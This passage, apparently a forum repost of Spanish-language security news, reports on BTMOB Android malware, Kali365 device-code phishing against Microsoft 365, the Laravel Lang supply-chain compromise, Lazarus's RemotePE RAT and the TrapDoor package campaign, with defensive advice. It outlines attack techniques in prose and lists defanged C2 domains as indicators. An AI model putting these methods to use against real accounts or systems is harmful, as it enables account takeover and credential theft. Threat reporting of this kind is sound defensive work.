El malware incorpora un generador de APK que facilita la creación de aplicaciones maliciosas adaptadas a distintos escenarios de phishing. Gracias a esta funcionalidad, los atacantes pueden modificar permisos, comportamiento y características del malware sin necesidad de escribir código.

Capacidades peligrosas de BTMOB

BTMOB destaca por ofrecer un amplio abanico de funciones diseñadas para maximizar el control sobre el dispositivo comprometido. Entre sus capacidades más peligrosas se encuentran:

• Robo de información sensible almacenada en el teléfono.
• Interceptación de transacciones financieras.
• Captura de pantalla en tiempo real.
• Control remoto del dispositivo infectado.
• Ocultamiento del icono de la aplicación para evitar su detección.
• Desactivación de Google Play Protect.
• Prevención del modo suspensión para mantener la actividad maliciosa.
• Obtención de permisos elevados mediante abuso de los Servicios de Accesibilidad de Android.

Una vez instalado, el malware solicita permisos avanzados que le permiten acceder a funciones críticas del sistema operativo. El abuso de los Servicios de Accesibilidad es especialmente preocupante, ya que brinda a los atacantes capacidades de supervisión y manipulación prácticamente totales sobre el dispositivo.

Este tipo de técnicas son ampliamente utilizadas por troyanos bancarios modernos debido a que permiten interceptar credenciales, leer mensajes SMS, capturar códigos de autenticación y ejecutar acciones automatizadas en aplicaciones bancarias.

Campañas de phishing dirigidas a usuarios Android

ESET reveló que BTMOB se distribuye principalmente mediante sitios web fraudulentos que se hacen pasar por servicios legítimos. Entre los señuelos identificados se encuentran plataformas de streaming y sitios relacionados con minería de criptomonedas.

Las víctimas potenciales son redirigidas a páginas falsas que imitan la apariencia de Google Play Store, donde se les solicita descargar aplicaciones aparentemente legítimas. Sin embargo, dichas aplicaciones contienen la carga maliciosa de BTMOB.

Además, investigadores de amenazas conocidos como Johnk3r y Merl detectaron campañas recientes en las que los operadores utilizaron como señuelo a una agencia gubernamental argentina para aumentar la credibilidad del ataque.

La capacidad de personalización de la plataforma permite adaptar los mensajes de phishing según el país, idioma y temática de cada campaña, incrementando considerablemente la efectividad de los ataques.

BTMOB y su relación con SpySolr

Los especialistas consideran que BTMOB podría ser una evolución directa de la familia de malware SpySolr, otro conocido malware Android asociado a operaciones de fraude financiero y espionaje móvil.

La similitud en técnicas de evasión, mecanismos de infección y abuso de accesibilidad sugiere que ambos proyectos podrían compartir desarrolladores o infraestructura.

Además, la rápida evolución observada en las versiones recientes demuestra que el autor del malware continúa trabajando activamente en mejorar sus capacidades. La firma Cyble ya había identificado múltiples muestras activas de BTMOB 2.5 durante febrero de 2025, lo que evidenciaba un ritmo acelerado de desarrollo.

El crecimiento del malware móvil en América Latina

América Latina se ha convertido en uno de los principales objetivos para operadores de malware bancario y troyanos móviles debido al aumento del uso de servicios financieros digitales y a las brechas de seguridad existentes en muchos dispositivos Android.

Brasil continúa liderando la región en volumen de ataques móviles, aunque países como México, Argentina, Colombia y Perú también experimentan un crecimiento sostenido en campañas de phishing y fraude financiero.

El éxito de plataformas MaaS como BTMOB demuestra que el cibercrimen continúa industrializándose. Ahora, actores maliciosos con pocos conocimientos técnicos pueden lanzar campañas sofisticadas utilizando herramientas ya preparadas y listas para operar.

Esto incrementa significativamente el riesgo para usuarios comunes y empresas que dependen de dispositivos móviles para operaciones financieras y acceso corporativo.

Cómo protegerse del malware BTMOB

Los expertos en ciberseguridad recomiendan adoptar medidas preventivas para reducir el riesgo de infección por malware Android:

Descargar aplicaciones únicamente desde Google Play Store

Evitar instalar APK desde sitios externos es una de las mejores prácticas para minimizar amenazas móviles.

Revisar cuidadosamente los permisos solicitados

Las aplicaciones que solicitan permisos excesivos, especialmente acceso a accesibilidad, SMS o administración del dispositivo, deben analizarse con cautela.

Mantener Google Play Protect activado

Esta función integrada ayuda a detectar aplicaciones maliciosas y comportamientos sospechosos.

Actualizar regularmente Android

Las actualizaciones de seguridad corrigen vulnerabilidades que podrían ser aprovechadas por malware avanzado.

Utilizar soluciones de seguridad móvil

El uso de antivirus y herramientas de protección móvil puede ayudar a detectar amenazas antes de que comprometan el dispositivo.

Evitar enlaces sospechosos

Los ataques de phishing continúan siendo la principal vía de distribución de malware Android, por lo que se recomienda no descargar aplicaciones desde enlaces recibidos por SMS, correo electrónico o redes sociales.

Una amenaza en constante evolución

BTMOB representa una nueva generación de malware Android orientado al fraude financiero y al control remoto de dispositivos móviles. Su modelo MaaS, junto con su capacidad de personalización y distribución mediante phishing localizado, lo convierten en una amenaza especialmente peligrosa para usuarios y organizaciones en América Latina.

La facilidad con la que los ciberdelincuentes pueden crear nuevas variantes dificulta el trabajo de las soluciones tradicionales de seguridad, obligando a las empresas y usuarios a adoptar estrategias de defensa multicapa y una mayor concienciación sobre riesgos móviles.

A medida que el malware móvil continúa evolucionando, amenazas como BTMOB demuestran que Android sigue siendo uno de los principales objetivos del cibercrimen global.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El Buró Federal de Investigaciones de Estados Unidos (FBI) emitió una alerta de seguridad sobre Kali365, una peligrosa plataforma de phishing como servicio (PhaaS) que está siendo utilizada para comprometer cuentas de Microsoft 365 mediante el abuso del flujo de autenticación por código de dispositivo OAuth.

La amenaza representa una evolución significativa en las campañas modernas de phishing, ya que permite a los ciberdelincuentes secuestrar cuentas corporativas sin necesidad de robar contraseñas ni interceptar códigos de autenticación multifactor (MFA).

Según el FBI, Kali365 apareció por primera vez en abril de 2026 y rápidamente comenzó a distribuirse a través de canales de Telegram especializados en cibercrimen, ofreciendo a atacantes de bajo nivel acceso a herramientas avanzadas capaces de comprometer entornos Microsoft Entra y Microsoft 365.

La plataforma ha generado preocupación entre expertos en ciberseguridad debido a su capacidad para explotar mecanismos legítimos de autenticación OAuth 2.0 y obtener acceso persistente a servicios cloud empresariales.

Qué es Kali365 y cómo funciona

Kali365 es una plataforma PhaaS diseñada específicamente para facilitar ataques de phishing contra usuarios de Microsoft 365 y Microsoft Entra.

Su principal objetivo es robar tokens de sesión OAuth válidos para obtener acceso completo a las cuentas de las víctimas, incluso cuando tienen habilitada la autenticación multifactor.

A diferencia del phishing tradicional, donde los atacantes intentan capturar credenciales y códigos MFA, Kali365 explota directamente el flujo legítimo de autenticación por código de dispositivo de Microsoft.

Este método permite a los atacantes:

• Obtener tokens OAuth válidos
• Eludir MFA
• Secuestrar sesiones autenticadas
• Acceder a aplicaciones SaaS corporativas
• Mantener persistencia dentro del entorno comprometido

Qué es el phishing por código de dispositivo

El phishing por código de dispositivo es una técnica que abusa del flujo de autorización OAuth 2.0 diseñado originalmente para dispositivos con capacidades limitadas de entrada.

Microsoft implementó este sistema para permitir que dispositivos como:

• Smart TVs
• Equipos de videoconferencia
• Dispositivos IoT
• Consolas multimedia
• Impresoras inteligentes

puedan autenticarse utilizando otro dispositivo mediante un código corto.

El usuario simplemente introduce un código temporal en el portal oficial:

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y aprueba la autenticación desde otro dispositivo ya autenticado.

Cómo los atacantes abusan del flujo OAuth

En las campañas de Kali365, los atacantes inician ellos mismos el proceso de autorización para generar un código OAuth válido.

Posteriormente, mediante phishing e ingeniería social, engañan a la víctima para que introduzca ese código en el portal legítimo de Microsoft.

Una vez que el usuario:

• Ingresa el código
• Completa la autenticación MFA
• Aprueba la solicitud

Microsoft genera automáticamente un token OAuth válido y lo entrega al atacante.

El resultado es extremadamente peligroso porque:

• No se roba la contraseña
• No se intercepta el MFA
• La víctima interactúa con un dominio legítimo
• El acceso parece una autenticación válida

Esto dificulta enormemente la detección por soluciones tradicionales de seguridad.

Kali365 permite secuestrar cuentas empresariales completas

Una vez obtenido el token OAuth, los atacantes pueden acceder a todas las aplicaciones conectadas mediante inicio de sesión único (SSO).

Esto incluye plataformas como:

• Microsoft 365
• Outlook
• SharePoint
• Teams
• OneDrive
• Salesforce
• Aplicaciones SaaS corporativas
• Portales cloud empresariales

Con este acceso, los ciberdelincuentes pueden:

• Robar correos electrónicos
• Exfiltrar documentos
• Comprometer información financiera
• Obtener datos internos
• Expandirse lateralmente dentro de la organización

Kali365 convierte el phishing avanzado en un servicio accesible

Uno de los aspectos más preocupantes destacados por el FBI es que Kali365 funciona como una plataforma comercial clandestina.

El servicio ofrece herramientas avanzadas incluso a ciberdelincuentes con poca experiencia técnica.

Entre las funcionalidades identificadas se encuentran:

Señuelos generados con IA

La plataforma utiliza inteligencia artificial para crear mensajes de phishing más convincentes y personalizados.

Plantillas automatizadas

Los atacantes pueden lanzar campañas rápidamente utilizando kits preconfigurados.

Paneles de monitoreo en tiempo real

Kali365 permite rastrear:

• Víctimas comprometidas
• Tokens capturados
• Sesiones activas
• Estado de autenticación

Captura avanzada de tokens
La plataforma automatiza el robo y almacenamiento de tokens OAuth válidos.

Arctic Wolf detectó campañas masivas globales

Investigadores de Arctic Wolf revelaron que Kali365 estuvo involucrado en campañas a gran escala dirigidas a organizaciones de todo el mundo.

Los ataques se enfocaban principalmente en entornos Microsoft 365 utilizando correos electrónicos fraudulentos que redirigían a las víctimas al portal legítimo de autenticación por código de dispositivo.

Debido a que el sitio web utilizado era real y pertenecía a Microsoft, muchas víctimas no sospechaban que estaban autorizando acceso a los atacantes.

Los atacantes ocultaban su actividad en Outlook

Tras comprometer las cuentas, los operadores de Kali365 implementaban técnicas para mantener el acceso y evitar ser detectados.

Entre las actividades observadas destacan:

• Creación de reglas maliciosas en Outlook
• Ocultamiento automático de correos
• Redirección de mensajes
• Eliminación de alertas de seguridad

Estas reglas permitían a los atacantes monitorear silenciosamente las comunicaciones internas de las organizaciones comprometidas.

Registro de dispositivos para persistencia

En algunos incidentes, los atacantes también registraron nuevos dispositivos dentro del entorno Microsoft Entra de las víctimas.

Esto les permitía:

• Mantener acceso persistente
• Renovar tokens
• Evadir cierres de sesión
• Ampliar privilegios

La táctica incrementa significativamente el impacto de la intrusión y complica las tareas de contención.

Kali365 opera como una organización criminal estructurada

Arctic Wolf indicó que Kali365 no funciona como una simple herramienta aislada, sino como una operación criminal organizada.

La plataforma incluye:

Administradores

Responsables del desarrollo y mantenimiento del servicio.

Revendedores

Encargados de promocionar Kali365 en foros y canales de Telegram.

Afiliados

Ciberdelincuentes que utilizan la infraestructura para lanzar campañas de phishing.

Este modelo de negocio refleja la creciente profesionalización del ecosistema de cibercrimen.

Kali365 también utiliza ataques Adversary-in-the-Middle

Además del phishing por código de dispositivo, la plataforma incorpora un segundo modo de ataque denominado:

• Cookie Link

Este mecanismo funciona como un ataque adversario en el medio (AitM).

El sistema proxia la sesión de la víctima a través de infraestructura controlada por los atacantes y captura:

• Cookies autenticadas
• Tokens de sesión
• Credenciales temporales
• Información de navegador

La técnica permite resolver automáticamente MFA y secuestrar sesiones activas.

El phishing OAuth se expande rápidamente en 2026

El FBI advirtió que el phishing basado en código de dispositivo se ha convertido en una de las técnicas más utilizadas por actores de amenazas durante 2026.

Otras plataformas y grupos criminales ya utilizan métodos similares, incluyendo:

• EvilTokens
• Tycoon2FA
• ShinyHunters

La adopción masiva de esta técnica demuestra que los ataques están evolucionando más allá del robo tradicional de contraseñas.

Cómo protegerse frente a Kali365

El FBI recomienda a las organizaciones implementar medidas inmediatas para reducir el riesgo.

Deshabilitar autenticación por código de dispositivo

Cuando sea posible:

• Bloquear flujos OAuth de código de dispositivo
• Restringir acceso mediante políticas condicionales

Auditar uso de OAuth

Revisar:

• Aplicaciones autorizadas
• Dispositivos registrados
• Tokens activos
• Accesos sospechosos

Bloquear transferencia de autenticación

Impedir que sesiones autenticadas se muevan entre dispositivos no autorizados.

Capacitar empleados

Educar usuarios sobre:

• Ingeniería social
• • Solicitudes OAuth sospechosas
  • Riesgos del phishing moderno
  
  Supervisar reglas de Outlook
  
  Detectar:
  
  
  • Reglas ocultas
  • Redirecciones sospechosas
  • Eliminación automática de mensajes
  
  Kali365 demuestra la evolución del phishing moderno
  
  La aparición de Kali365 confirma que los ataques de phishing están evolucionando rápidamente hacia métodos mucho más sofisticados y difíciles de detectar.
  
  El abuso de mecanismos legítimos de OAuth, combinado con robo de tokens y técnicas AitM, permite a los atacantes eludir MFA y comprometer cuentas empresariales sin necesidad de robar contraseñas.
  
  Para las organizaciones, esto representa un desafío crítico, ya que las soluciones tradicionales de seguridad centradas únicamente en credenciales ya no son suficientes para detener amenazas modernas basadas en tokens y autenticación federada.
  
  La seguridad de identidades y accesos cloud se perfila ahora como uno de los pilares más importantes de la ciberseguridad empresarial moderna.
  
  Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La comunidad de desarrollo PHP y Laravel enfrenta una nueva amenaza de ciberseguridad tras descubrirse un sofisticado ataque a la cadena de suministro que comprometió varios paquetes de localización de Laravel Lang utilizados ampliamente en proyectos web y aplicaciones empresariales.

Investigadores de seguridad de StepSecurity, Aikido Security y Socket revelaron que atacantes lograron manipular etiquetas de versiones en GitHub para distribuir malware mediante Composer, el gestor de dependencias más utilizado en el ecosistema PHP.

El incidente representa una evolución alarmante en los ataques supply chain, ya que los ciberdelincuentes no publicaron nuevas versiones maliciosas visibles, sino que aprovecharon una funcionalidad legítima de GitHub para redirigir etiquetas existentes hacia commits controlados por los atacantes.

Como resultado, miles de desarrolladores pudieron instalar código malicioso creyendo que descargaban versiones legítimas de paquetes Laravel Lang.

Qué paquetes Laravel Lang fueron comprometidos

Los investigadores confirmaron que los siguientes paquetes fueron afectados:

• laravel-lang/lang
• laravel-lang/http-statuses
• laravel-lang/attributes
• Posiblemente laravel-lang/actions

Es importante destacar que Laravel Lang es un proyecto de terceros y no forma parte oficial del framework Laravel. Sin embargo, estos paquetes son ampliamente utilizados para implementar traducciones y localización en aplicaciones PHP.

Según Aikido Security, el ataque comprometió al menos 233 versiones distribuidas en tres repositorios diferentes, mientras que Socket estima que aproximadamente 700 versiones históricas pudieron verse afectadas.

Cómo funcionó el ataque a la cadena de suministro

El aspecto más peligroso de este incidente es la técnica utilizada para comprometer las versiones de los paquetes.

En lugar de modificar directamente el código fuente principal o publicar nuevas versiones sospechosas, los atacantes aprovecharon una característica de GitHub que permite que las etiquetas (tags) apunten a commits almacenados en forks del mismo repositorio.

Esto permitió a los actores maliciosos:

• Reescribir etiquetas existentes
• Mantener nombres legítimos de versiones
• Evadir sospechas inmediatas
• Distribuir malware silenciosamente mediante Composer

Los investigadores explicaron que los atacantes reescribieron todas las etiquetas Git existentes para apuntar a commits maliciosos almacenados en forks bajo su control.

La operación comenzó a las 22:32 UTC contra el paquete principal laravel-lang/lang y finalizó alrededor de las 00:00 UTC afectando otros repositorios relacionados.

Todos los repositorios comprometidos compartían:

• La misma identidad falsa de autor
• Archivos modificados idénticos
• El mismo comportamiento malicioso
• Infraestructura C2 compartida

Esto indica que probablemente un único actor obtuvo acceso privilegiado a nivel organizacional mediante credenciales comprometidas.

Composer descargaba malware sin alertar al desarrollador

Cuando un desarrollador instalaba o actualizaba uno de los paquetes afectados mediante Composer, el sistema descargaba automáticamente el código malicioso creyendo que se trataba de una versión oficial y legítima.

El ataque era especialmente efectivo porque:

• Las versiones aparentaban ser legítimas
• No existían nuevos releases sospechosos
• Los hashes parecían válidos
• Composer confiaba en las etiquetas manipuladas

Este método permitió a los atacantes comprometer entornos de desarrollo, servidores y pipelines CI/CD sin generar alertas inmediatas.

El malware utilizaba un archivo malicioso llamado helpers.php

Los investigadores identificaron que las versiones comprometidas agregaban un archivo malicioso denominado:

• src/helpers.php

Este archivo era cargado automáticamente por Composer durante la instalación del paquete.

El código actuaba como un dropper encargado de descargar una segunda carga útil desde el servidor de comando y control:

• flipboxstudio[.]info

Una vez descargado, el malware iniciaba operaciones de robo de credenciales y exfiltración de datos sensibles.

Malware diseñado para robar secretos cloud y credenciales DevOps

La carga útil PHP utilizada por los atacantes funcionaba como un infostealer multiplataforma compatible con:

• Windows
• Linux
• macOS

El malware estaba diseñado para recolectar información extremadamente sensible relacionada con infraestructura cloud y entornos de desarrollo modernos.

Entre los datos robados destacan:

Credenciales cloud

• Claves AWS
• Tokens de acceso
• Secretos cloud

Secretos DevOps

• Variables .env
• Tokens CI/CD
• Credenciales Git
• Configuraciones Kubernetes
• Tokens Vault

Información de navegadores

• Cookies
• Credenciales almacenadas
• Sesiones activas

Datos criptográficos

• Wallets de criptomonedas
• Frases de recuperación
• Claves privadas SSH

Gestores y herramientas corporativas

• Tokens GitHub
• Tokens Slack
• Secretos Stripe
• JWTs
• Configuraciones VPN

El malware incluía expresiones regulares avanzadas específicamente diseñadas para localizar automáticamente credenciales sensibles dentro de archivos locales y variables de entorno.

El componente para Windows utilizaba DebugElevator

En sistemas Windows, el malware desplegaba una segunda etapa aún más peligrosa.

La carga PHP extraía un ejecutable codificado en Base64 y lo escribía en la carpeta temporal del sistema con un nombre aleatorio .exe.

El análisis reveló que el ejecutable se denominaba:

• DebugElevator

Este componente estaba específicamente diseñado para atacar navegadores basados en Chromium como:

• Google Chrome
• Brave
• Microsoft Edge

Su objetivo era extraer claves de cifrado vinculadas a la aplicación necesarias para descifrar credenciales almacenadas en el navegador.

Evidencias del uso de inteligencia artificial en el malware

Uno de los detalles más llamativos encontrados por los investigadores fue una ruta PDB integrada dentro del ejecutable malicioso:

• C:\Users\Mero\OneDrive\Desktop\stuff\claude\Chromium-DebugElevator\x64\Release\DebugChromium.pdb

La referencia al término "claude" sugiere que los atacantes podrían haber utilizado herramientas de inteligencia artificial para asistir en el desarrollo del malware.

Aunque esto no constituye una confirmación definitiva, refleja una tendencia creciente donde actores maliciosos utilizan IA para:

• Automatizar desarrollo de malware
• Mejorar evasión
• Crear loaders personalizados
• Optimizar robo de credenciales

El malware cifraba y exfiltraba los datos robados

Una vez recopilada la información sensible, el malware:

• Cifraba los datos robados
• Establecía conexión con el servidor C2
• Exfiltraba la información a la infraestructura controlada por los atacantes

Esto dificultaba la inspección del tráfico y aumentaba las posibilidades de que el robo pasara desapercibido.

Packagist eliminó rápidamente las versiones maliciosas

Tras descubrir el incidente, Aikido notificó a Packagist, repositorio principal de paquetes PHP utilizado por Composer.

Packagist respondió rápidamente:

• Eliminando versiones comprometidas
• Deshabilitando temporalmente paquetes afectados
• Bloqueando nuevas instalaciones potencialmente maliciosas

Sin embargo, cualquier sistema que hubiera instalado versiones comprometidas antes de la mitigación podría seguir afectado.

Qué deben hacer los desarrolladores afectados

Los expertos recomiendan actuar de inmediato si se utilizaron paquetes Laravel Lang recientemente.

Revisar versiones instaladas

Verificar si los sistemas descargaron versiones comprometidas.

Rotar todas las credenciales

Cambiar inmediatamente:

• Tokens cloud
• Claves SSH
• Contraseñas
• Secretos CI/CD
• Tokens GitHub y Slack

Buscar indicadores de compromiso

Inspeccionar:

• Procesos sospechosos
• Conexiones salientes
• Archivos temporales
• Modificaciones en .env

Revisar tráfico histórico

Buscar conexiones hacia:

• flipboxstudio[.]info

Analizar endpoints Windows

Especialmente aquellos con:

• Chrome
• Brave
• Edge

Los ataques supply chain siguen creciendo

El compromiso de Laravel Lang demuestra nuevamente que los ataques a la cadena de suministro continúan evolucionando y apuntando directamente a ecosistemas de desarrollo ampliamente utilizados.

La capacidad de manipular etiquetas Git legítimas sin modificar aparentemente el código fuente representa un cambio peligroso en las tácticas utilizadas por los ciberdelincuentes.

Los desarrolladores y organizaciones deberán reforzar sus procesos de validación de dependencias, monitoreo de integridad y protección de secretos para reducir el riesgo frente a futuras campañas similares.

El incidente también evidencia cómo Composer, GitHub y los ecosistemas open source continúan siendo objetivos prioritarios para actores maliciosos interesados en comprometer masivamente entornos corporativos, infraestructura cloud y proyectos de software críticos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores en ciberseguridad han revelado nuevos detalles sobre RemotePE, un sofisticado malware multiplataforma utilizado por el grupo Lazarus, organización de amenazas vinculada a Corea del Norte y conocida por sus ataques dirigidos contra entidades financieras, plataformas DeFi y empresas de criptomonedas en todo el mundo.

El análisis realizado por Fox-IT, filial de NCC Group, expone una compleja cadena de infección compuesta por múltiples etapas y diseñada específicamente para mantener acceso persistente, evadir soluciones EDR y operar completamente en memoria sin dejar rastros visibles en el sistema comprometido.

La investigación demuestra cómo Lazarus continúa perfeccionando sus herramientas ofensivas para ejecutar operaciones de espionaje, robo financiero y compromiso prolongado de objetivos de alto valor dentro del ecosistema blockchain y financiero global.

¿Qué es RemotePE y por qué representa una amenaza crítica?

RemotePE es un RAT (Remote Access Trojan) avanzado escrito en C++ que permite a los atacantes controlar de forma remota sistemas comprometidos. Su principal característica es que funciona completamente en memoria, evitando escribir archivos en disco y reduciendo significativamente las posibilidades de detección por parte de antivirus tradicionales y herramientas forenses.

El malware forma parte de una arquitectura modular compuesta por:

• DPAPILoader
• RemotePELoader
• RemotePE

Cada componente cumple una función específica dentro del proceso de infección, persistencia y control remoto.

Según los investigadores, esta infraestructura maliciosa fue diseñada para operaciones de espionaje silencioso y acceso furtivo a largo plazo, una táctica ampliamente asociada con Lazarus en campañas dirigidas contra organizaciones financieras y empresas relacionadas con criptomonedas.

Lazarus y su historial de ataques financieros

El grupo Lazarus ha sido vinculado durante años a algunos de los mayores robos cibernéticos del mundo, incluyendo ataques contra exchanges de criptomonedas, plataformas DeFi, bancos y empresas tecnológicas.

Las operaciones del grupo suelen caracterizarse por:

• Ingeniería social avanzada
• Malware personalizado
• Técnicas de evasión sofisticadas
• Ataques supply chain
• Persistencia prolongada
• Robo masivo de activos digitales

En este caso, RemotePE fue identificado inicialmente en septiembre de 2025 durante una intrusión dirigida contra una organización del sector DeFi.

La campaña también involucró otras familias de malware como:

• PondRAT
• ThemeForestRAT
• POOLRAT (SIMPLESEA)

Cómo comienza la infección de RemotePE

La intrusión analizada por Fox-IT comenzó mediante técnicas de ingeniería social altamente dirigidas.

Los atacantes contactaron a la víctima a través de Telegram haciéndose pasar por un antiguo empleado de una empresa comercial. Posteriormente, programaron una falsa reunión utilizando dominios fraudulentos que imitaban servicios legítimos como Calendly y Picktime.

Este enfoque demuestra la precisión con la que Lazarus selecciona y estudia a sus víctimas antes de iniciar una operación.

Una vez comprometido el dispositivo, comienza la ejecución de la cadena de infección.

Etapa 1: DPAPILoader y el uso de Windows DPAPI

La primera etapa utiliza una DLL denominada:

• Iassvc.dll

Este componente, identificado como DPAPILoader, emplea la API de Protección de Datos de Windows (DPAPI) para descifrar cargas útiles almacenadas localmente.

El uso de DPAPI permite ocultar el malware utilizando mecanismos legítimos del sistema operativo, dificultando su análisis y detección.

Los investigadores indicaron que las muestras más antiguas de DPAPILoader se remontan a noviembre de 2023, lo que demuestra que el malware lleva años en desarrollo activo.

Etapa 2: RemotePELoader y evasión avanzada

Tras descifrar la carga útil, DPAPILoader ejecuta un segundo componente denominado RemotePELoader.

Este módulo se conecta a un servidor remoto de comando y control (C2) mediante HTTP para descargar la siguiente etapa del malware.

El dominio utilizado por los atacantes fue identificado como:

• aes-secure[.]net

Antes de cargar el payload final, RemotePELoader implementa múltiples técnicas de evasión para evitar la detección por soluciones de seguridad modernas.

Entre ellas destacan:

Hell's Gate

Técnica utilizada para evadir hooks de EDR y ejecutar llamadas directas al sistema operativo.

Patching de ETW

El malware modifica el sistema de Event Tracing for Windows (ETW) para impedir que herramientas de monitoreo registren su actividad.

Estas capacidades reflejan un alto nivel de sofisticación técnica y un profundo conocimiento interno de Windows.

RemotePE: el RAT que opera completamente en memoria

La etapa final de la cadena es RemotePE, un troyano de acceso remoto capaz de ejecutar comandos avanzados directamente desde memoria.

El malware consulta constantemente al servidor C2 para recibir instrucciones adicionales y soporta múltiples categorías de comandos.

Entre las funciones identificadas se encuentran:

Gestión de configuración

• Obtener configuración C2
• Modificar parámetros internos

Gestión de módulos

• Registrar DLLs
• Cargar bibliotecas dinámicas
• Descargar componentes adicionales

Operaciones de archivos

• Crear archivos
• Modificar datos
• Eliminar evidencias

Gestión de procesos

• Enumerar procesos activos
• Crear nuevos procesos
• Finalizar procesos específicos

Control operativo

• Suspender actividad temporalmente
• Finalizar ejecución
• Enviar señales de comunicación al C2

Técnicas avanzadas de eliminación de archivos

Uno de los aspectos más llamativos de RemotePE es su mecanismo de borrado seguro de archivos.

Antes de eliminar un archivo, el malware:

• Sobrescribe su contenido siete veces
• Utiliza bytes constantes para destruir datos
• Renombra el archivo
• Procede a eliminarlo definitivamente

Esta técnica también ha sido observada en otras herramientas asociadas con Lazarus, como PondRAT y POOLRAT.

El objetivo es dificultar la recuperación forense de evidencias tras una intrusión.

Malware diseñado para espionaje y robo financiero silencioso

Los investigadores de Fox-IT señalaron que el comportamiento de RemotePE sugiere operaciones de observación a largo plazo.

El malware está optimizado para:

• Permanecer oculto durante meses
• Evadir antivirus y EDR
• Mantener acceso persistente
• Minimizar artefactos forenses
• Esperar el momento adecuado para ejecutar ataques de alto impacto

Este enfoque es consistente con las operaciones históricas de Lazarus, donde los atacantes permanecen dentro de las redes comprometidas durante largos periodos antes de ejecutar robo de datos o transferencias financieras fraudulentas.

RemotePE y la amenaza creciente contra el sector cripto

Las organizaciones relacionadas con criptomonedas continúan siendo uno de los principales objetivos del grupo Lazarus debido al enorme valor económico de los activos digitales.

Los ataques dirigidos a:

• Exchanges
• Plataformas DeFi
• Empresas blockchain
• Fondos de inversión cripto
• Infraestructura Web3

han aumentado significativamente en los últimos años.

La utilización de malware como RemotePE demuestra que Lazarus sigue invirtiendo en herramientas cada vez más sofisticadas para comprometer sistemas críticos y acceder a credenciales sensibles.

Cómo protegerse frente a RemotePE y Lazarus

Los expertos recomiendan implementar múltiples capas de seguridad para reducir el riesgo de compromiso:

Capacitación contra ingeniería social

Los empleados deben ser entrenados para detectar:

• Dominios falsos
• Invitaciones sospechosas
• Mensajes fraudulentos en Telegram y LinkedIn

Protección EDR avanzada

Implementar soluciones capaces de detectar:

• Ejecución en memoria
• Técnicas Hell's Gate
• Manipulación ETW
• Actividad anómala de procesos

Segmentación de accesos

Limitar privilegios administrativos y restringir acceso a:

• Wallets corporativas
• Claves privadas
• Infraestructura cloud

Supervisión continua

Monitorizar:

• Tráfico HTTP sospechoso
• Conexiones C2
• Carga dinámica de DLLs
• Procesos inusuales

RemotePE confirma la evolución de Lazarus

La aparición de RemotePE evidencia que Lazarus continúa evolucionando sus capacidades ofensivas con malware diseñado específicamente para operaciones encubiertas y persistentes.

El uso de ejecución exclusivamente en memoria, evasión avanzada de EDR y técnicas antiforenses convierte a esta amenaza en una de las campañas más peligrosas dirigidas actualmente contra organizaciones financieras y empresas de criptomonedas.

A medida que los ataques patrocinados por estados se vuelven más sofisticados, las empresas deberán reforzar sus estrategias de ciberseguridad para detectar amenazas avanzadas antes de que puedan generar pérdidas financieras o compromisos masivos de información sensible.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una nueva campaña de ataques a la cadena de suministro de software está encendiendo las alarmas en la comunidad de ciberseguridad tras comprometer múltiples ecosistemas de desarrollo ampliamente utilizados. Bautizada como TrapDoor, esta operación maliciosa ha sido diseñada para distribuir malware a través de paquetes infectados en npm, PyPI y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, afectando especialmente a desarrolladores vinculados con criptomonedas, proyectos DeFi, inteligencia artificial y el ecosistema Solana.

La campaña destaca por su sofisticación técnica, su capacidad de persistencia y por combinar técnicas tradicionales de typosquatting con nuevas estrategias dirigidas a flujos de trabajo modernos de desarrollo e inteligencia artificial. Según los investigadores de Socket, los atacantes han publicado más de 34 paquetes maliciosos distribuidos en al menos 384 versiones diferentes, utilizando múltiples cuentas y oleadas coordinadas para maximizar el alcance del ataque.

TrapDoor apunta a desarrolladores de criptomonedas, IA y entornos cloud

El principal objetivo de TrapDoor es el robo masivo de información sensible. Los paquetes maliciosos fueron diseñados para extraer:

• Credenciales de desarrolladores
• Claves SSH
• Tokens de AWS y GitHub
• Variables de entorno
• Wallets de criptomonedas
• Datos almacenados en navegadores
• Secretos DevOps
• Configuraciones cloud

Los investigadores señalaron que varios paquetes npm desplegaban una carga útil compartida denominada trap-core.js, un malware capaz de realizar reconocimiento interno, validar credenciales robadas y establecer mecanismos avanzados de persistencia dentro de los sistemas comprometidos.

Entre las acciones realizadas por el malware destacan:

• Escaneo automático de secretos y credenciales
• Validación de tokens AWS y GitHub mediante APIs legítimas
• Persistencia mediante cron jobs y servicios systemd
• Creación de hooks maliciosos en Git
• Movimiento lateral vía SSH
• Manipulación de archivos de configuración utilizados por herramientas de IA

Este tipo de ataque representa una amenaza crítica para organizaciones que dependen de pipelines automatizados, integración continua (CI/CD) y entornos de desarrollo modernos.

Paquetes maliciosos distribuidos en npm, PyPI y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La campaña afectó simultáneamente a tres de los ecosistemas de software más importantes del mundo:

Paquetes maliciosos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los paquetes dirigidos al ecosistema Rust se enfocaban especialmente en desarrolladores relacionados con Sui y Move. Entre ellos destacan:

• mover-analyzer-build
• mover-compiler-tools
• mover-project-builder
• Sui-Framework-Helpers
• Sui-move-build-helper
• sui-sdk-build-utils

Estos paquetes utilizaban scripts You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para ejecutar automáticamente código malicioso durante el proceso de compilación.

Malware en npm dirigido a Web3 e IA

El ecosistema npm fue uno de los más afectados por TrapDoor. Los atacantes publicaron paquetes que aparentaban ser herramientas legítimas para desarrollo blockchain, IA y seguridad DevOps.

Algunos de los paquetes identificados incluyen:

• async-pipeline-builder
• build-scripts-utils
• crypto-credentials-scanner
• defi-env-auditor
• eth-wallet-sentinel
• mnemonic-security-checker
• model-switch-router
• prompt-engineering-toolkit
• solidity-deploy-guard
• wallet-backup-checker
• web3-secrets-detector

Estos módulos ejecutaban hooks postinstalación capaces de descargar y activar malware inmediatamente después de ser instalados por el desarrollador.

PyPI también fue utilizado para distribuir malware

